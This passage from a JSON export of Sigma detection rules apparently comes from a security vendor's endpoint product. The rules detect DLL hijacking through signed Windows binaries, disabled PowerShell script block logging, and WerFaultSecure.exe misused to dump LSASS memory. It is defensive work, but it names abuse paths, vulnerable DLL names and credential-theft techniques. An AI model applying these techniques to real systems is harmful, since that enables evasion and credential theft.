- '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "18ae8604-550e-4ae2-a46b-dd87ad258288", "rule_name": "DLL Hijacking via ehstorauthn.exe", "rule_description": "Detects potential Windows DLL Hijacking via ehstorauthn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "18fb7194-8782-460e-b4ef-73265aabdd6b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591625Z", "creation_date": "2026-03-23T11:45:34.591628Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591636Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_rmttpmvscmgrsvr.yml", "content": "title: DLL Hijacking via rmttpmvscmgrsvr.exe\nid: 18fb7194-8782-460e-b4ef-73265aabdd6b\ndescription: |\n Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmttpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "18fb7194-8782-460e-b4ef-73265aabdd6b", "rule_name": "DLL Hijacking via rmttpmvscmgrsvr.exe", "rule_description": "Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623027Z", "creation_date": "2026-03-23T11:45:34.623029Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623033Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging", "https://attack.mitre.org/techniques/T1112/", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1112_script_block_logging_disabled_registry.yml", "content": "title: Script Block Logging Disabled in Registry\nid: 191f1aa8-40cc-4b37-b39c-8821d11b97d5\ndescription: |\n Detects the EnableScriptBlockLogging value being set to 0 in registry.\n Attackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\n It is recommended to investigate the process that did this modification, as well as its execution context.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n TargetObject|contains: 'EnableScriptBlockLogging'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_lgpo:\n ProcessImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_nable:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - ProcessImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n\n exclusion_monitoring_agent:\n ProcessImage:\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent GP\\ScriptRunner\\ScriptRunner.exe'\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent\\ScriptRunner\\ScriptRunner.exe'\n\n exclusion_mmc:\n ProcessCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\\\*'\n\n exclusion_checkpoint:\n ProcessImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_windows:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - '?:\\windows\\system32\\deviceenroller.exe'\n - '?:\\windows\\syswow64\\deviceenroller.exe'\n - '?:\\windows\\system32\\omadmclient.exe'\n - '?:\\windows\\syswow64\\omadmclient.exe'\n - '?:\\windows\\system32\\vmms.exe'\n - '?:\\windows\\syswow64\\vmms.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_ishealth:\n ProcessImage:\n - '?:\\Program Files (x86)\\IS-Health\\IS-Health\\IS-Health.exe'\n - '?:\\Program Files\\IS-Health\\IS-Health\\IS-Health.exe'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5", "rule_name": "Script Block Logging Disabled in Registry", "rule_description": "Detects the EnableScriptBlockLogging value being set to 0 in registry.\nAttackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\nIt is recommended to investigate the process that did this modification, as well as its execution context.\n", "rule_creation_date": "2025-08-29", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080714Z", "creation_date": "2026-03-23T11:45:34.080716Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080720Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/0gtweet/status/1477925112561209344", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_format_com.yml", "content": "title: DLL Hijacking via format.com\nid: 1982114f-b8b0-4ab1-8856-9eb7baf58dd8\ndescription: |\n Detects potential Windows DLL Hijacking via format.com.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1477925112561209344\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/01/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'format.com'\n ProcessSignature: 'Microsoft Windows'\n #ImageLoaded: '*.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8", "rule_name": "DLL Hijacking via format.com", "rule_description": "Detects potential Windows DLL Hijacking via format.com.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-01-05", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "198dc4a0-fad3-4a63-96df-c66da0fff340", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.078646Z", "creation_date": "2026-03-23T11:45:34.078648Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.078652Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wifitask.yml", "content": "title: DLL Hijacking via wifitask.exe\nid: 198dc4a0-fad3-4a63-96df-c66da0fff340\ndescription: |\n Detects potential Windows DLL Hijacking via wifitask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wifitask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\HTTPAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\umpdc.dll'\n - '\\webservices.dll'\n - '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "198dc4a0-fad3-4a63-96df-c66da0fff340", "rule_name": "DLL Hijacking via wifitask.exe", "rule_description": "Detects potential Windows DLL Hijacking via wifitask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "19d12965-f4b4-469a-b904-87bd6dc211d8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.595087Z", "creation_date": "2026-03-23T11:45:34.595091Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.595099Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dsrm.yml", "content": "title: DLL Hijacking via dsr.exe\nid: 19d12965-f4b4-469a-b904-87bd6dc211d8\ndescription: |\n Detects potential Windows DLL Hijacking via dsr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsrm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "19d12965-f4b4-469a-b904-87bd6dc211d8", "rule_name": "DLL Hijacking via dsr.exe", "rule_description": "Detects potential Windows DLL Hijacking via dsr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092694Z", "creation_date": "2026-03-23T11:45:34.092696Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.092701Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_recoverydrive.yml", "content": "title: DLL Hijacking via RECOVERYDRIVE.exe\nid: 1a1f6e7a-2498-43ab-a378-5c398ec012d1\ndescription: |\n Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RECOVERYDRIVE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\reagent.dll'\n - '\\unattend.dll'\n - '\\uxtheme.dll'\n - '\\vssapi.dll'\n - '\\wdscore.dll'\n - '\\wimgapi.dll'\n - '\\winhttp.dll'\n - '\\wofutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1", "rule_name": "DLL Hijacking via RECOVERYDRIVE.exe", "rule_description": "Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1a5344cf-01b1-4cce-92c3-e46480185079", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086161Z", "creation_date": "2026-03-23T11:45:34.086163Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086168Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html", "https://attack.mitre.org/techniques/T1003/001/" ], "name": "t1003_001_werfaultsecure_unknown_location.yml", "content": "title: WerFaultSecure.exe Executed From a Non-Common Location\nid: 1a5344cf-01b1-4cce-92c3-e46480185079\ndescription: |\n Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\n WerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\n Attackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\n It is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2025/09/15\nmodified: 2025/10/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n\n filter_legitimate_folder:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_serviceprotection:\n ParentImage: '?:\\Program Files\\ServiceProtection\\ServiceProtection.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'PHARMADATA PTY LTD'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1a5344cf-01b1-4cce-92c3-e46480185079", "rule_name": "WerFaultSecure.exe Executed From a Non-Common Location", "rule_description": "Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\nWerFaultSecure.exe is a Microsoft-signed binary used by 